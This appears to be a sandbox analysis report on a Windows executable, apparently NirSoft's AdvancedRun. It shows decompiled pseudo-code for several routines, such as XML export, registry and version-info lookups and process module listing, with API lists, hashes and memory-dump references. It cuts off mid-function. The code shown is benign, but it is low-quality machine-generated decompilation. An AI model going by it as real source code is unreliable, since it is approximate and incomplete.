                                                                                                                • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                                0x00407d9c
                                                                                                                0x00407d9e
                                                                                                                0x00407da5
                                                                                                                0x00407db3
                                                                                                                0x00407dba
                                                                                                                0x00407dc5
                                                                                                                0x00407dc7
                                                                                                                0x00407dd0
                                                                                                                0x00407dc9
                                                                                                                0x00407dc9
                                                                                                                0x00407dc9
                                                                                                                0x00407dd8
                                                                                                                0x00407de1
                                                                                                                0x00407de5
                                                                                                                0x00407deb
                                                                                                                0x00407df2
                                                                                                                0x00407df3
                                                                                                                0x00407dfe
                                                                                                                0x00407e03
                                                                                                                0x00407e04
                                                                                                                0x00407e21

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                • <%s>, xrefs: 00407DF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                                0x00403b56
                                                                                                                0x00403b5d
                                                                                                                0x00403b6f
                                                                                                                0x00403b76
                                                                                                                0x00403b82
                                                                                                                0x00403b8d
                                                                                                                0x00403b8e
                                                                                                                0x00403b99
                                                                                                                0x00403b9e
                                                                                                                0x00403b9f
                                                                                                                0x00403ba7
                                                                                                                0x00403bb9
                                                                                                                0x00403bce
                                                                                                                0x00403be5
                                                                                                                0x00403bef
                                                                                                                0x00403bf8
                                                                                                                0x00403c00

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403B5D
                                                                                                                • memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                  • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                  • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                  • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                • API String ID: 1832587304-479876776
                                                                                                                • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                                0x0040afd3
                                                                                                                0x0040afe2
                                                                                                                0x0040aff3
                                                                                                                0x0040b002
                                                                                                                0x0040b023
                                                                                                                0x00000000
                                                                                                                0x0040b047
                                                                                                                0x0040b02e
                                                                                                                0x0040b034
                                                                                                                0x0040b03c
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                • wcscat.MSVCRT ref: 0040B002
                                                                                                                • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                                  • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                • String ID: \StringFileInfo\
                                                                                                                • API String ID: 393120378-2245444037
                                                                                                                • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                • API String ID: 999028693-502967061
                                                                                                                • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}


























                                                                                                                0x004092f3
                                                                                                                0x004092fb
                                                                                                                0x00409303
                                                                                                                0x00409305
                                                                                                                0x00409310
                                                                                                                0x00409433
                                                                                                                0x00409433
                                                                                                                0x00409439
                                                                                                                0x0040943f
                                                                                                                0x00409445
                                                                                                                0x0040944b
                                                                                                                0x0040944e
                                                                                                                0x00409452
                                                                                                                0x00409466
                                                                                                                0x0040946e
                                                                                                                0x00409475
                                                                                                                0x004094f7
                                                                                                                0x004094f7
                                                                                                                0x004094f9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409488
                                                                                                                0x00409494
                                                                                                                0x004094a5
                                                                                                                0x004094a9
                                                                                                                0x004094b5
                                                                                                                0x004094c3
                                                                                                                0x004094c6
                                                                                                                0x004094d5
                                                                                                                0x004094dc
                                                                                                                0x004094e1
                                                                                                                0x004094e3
                                                                                                                0x004094f1
                                                                                                                0x00000000
                                                                                                                0x004094f1
                                                                                                                0x00000000
                                                                                                                0x004094e3
                                                                                                                0x00000000
                                                                                                                0x004094f7
                                                                                                                0x00409452
                                                                                                                0x00409316
                                                                                                                0x00409316
                                                                                                                0x0040931c
                                                                                                                0x00000000
                                                                                                                0x00409322
                                                                                                                0x0040932b
                                                                                                                0x00409333
                                                                                                                0x00409337
                                                                                                                0x00409341
                                                                                                                0x00409342
                                                                                                                0x0040934e
                                                                                                                0x0040934f
                                                                                                                0x00409358
                                                                                                                0x0040935e
                                                                                                                0x0040935e
                                                                                                                0x00409363
                                                                                                                0x0040936b
                                                                                                                0x0040936d
                                                                                                                0x00409377
                                                                                                                0x00409385
                                                                                                                0x0040938d
                                                                                                                0x0040939d
                                                                                                                0x004093a5
                                                                                                                0x004093ac
                                                                                                                0x004093b4
                                                                                                                0x004093c5
                                                                                                                0x004093c9
                                                                                                                0x004093da
                                                                                                                0x004093df
                                                                                                                0x004093e5
                                                                                                                0x004093e6
                                                                                                                0x004093ea
                                                                                                                0x004093f6
                                                                                                                0x004093fc
                                                                                                                0x00409407
                                                                                                                0x00409407
                                                                                                                0x0040941d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409423
                                                                                                                0x00409428
                                                                                                                0x00409375
                                                                                                                0x00409375
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040942e
                                                                                                                0x00000000
                                                                                                                0x00409428
                                                                                                                0x00409377
                                                                                                                0x0040936d
                                                                                                                0x004094fb
                                                                                                                0x004094ff
                                                                                                                0x004094ff
                                                                                                                0x00409337
                                                                                                                0x0040931c
                                                                                                                0x0040950f

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                • memset.MSVCRT ref: 0040938D
                                                                                                                • memset.MSVCRT ref: 0040939D
                                                                                                                  • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                • memset.MSVCRT ref: 00409488
                                                                                                                • wcscpy.MSVCRT ref: 004094A9
                                                                                                                • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3300951397-0
                                                                                                                • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                0x00402ed7
                                                                                                                0x00402eee
                                                                                                                0x00402ef8
                                                                                                                0x00402f00
                                                                                                                0x00402f01
                                                                                                                0x00402f05
                                                                                                                0x00402f0a
                                                                                                                0x00402f1a
                                                                                                                0x00402f30

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 19018683-0
                                                                                                                • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 50%
                                                                                                                			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                                0x004079a4
                                                                                                                0x004079b8
                                                                                                                0x004079bd
                                                                                                                0x004079c2
                                                                                                                0x004079c5
                                                                                                                0x004079c5
                                                                                                                0x004079db
                                                                                                                0x004079f7
                                                                                                                0x00407a06
                                                                                                                0x00407a0c
                                                                                                                0x00407a11
                                                                                                                0x00407a13
                                                                                                                0x00407a14
                                                                                                                0x00407a17
                                                                                                                0x00407a18
                                                                                                                0x00407a1d
                                                                                                                0x00407a22
                                                                                                                0x00407a25
                                                                                                                0x00407a2a
                                                                                                                0x00407a35
                                                                                                                0x00407a3a
                                                                                                                0x00407a3b
                                                                                                                0x00407a40
                                                                                                                0x00407a52

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004079DB
                                                                                                                  • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                                0x00404683
                                                                                                                0x00404692
                                                                                                                0x00404699
                                                                                                                0x0040469b
                                                                                                                0x004046af
                                                                                                                0x004046ba
                                                                                                                0x004046bc
                                                                                                                0x004046c7
                                                                                                                0x004046cc
                                                                                                                0x004046cd
                                                                                                                0x004046ee
                                                                                                                0x004046f3
                                                                                                                0x004046fa
                                                                                                                0x004046fa
                                                                                                                0x004046ee
                                                                                                                0x00404705

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004046AF
                                                                                                                • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen_snwprintfmemset
                                                                                                                • String ID: %s\shell\%s
                                                                                                                • API String ID: 1458959524-3196117466
                                                                                                                • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 16%
                                                                                                                			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
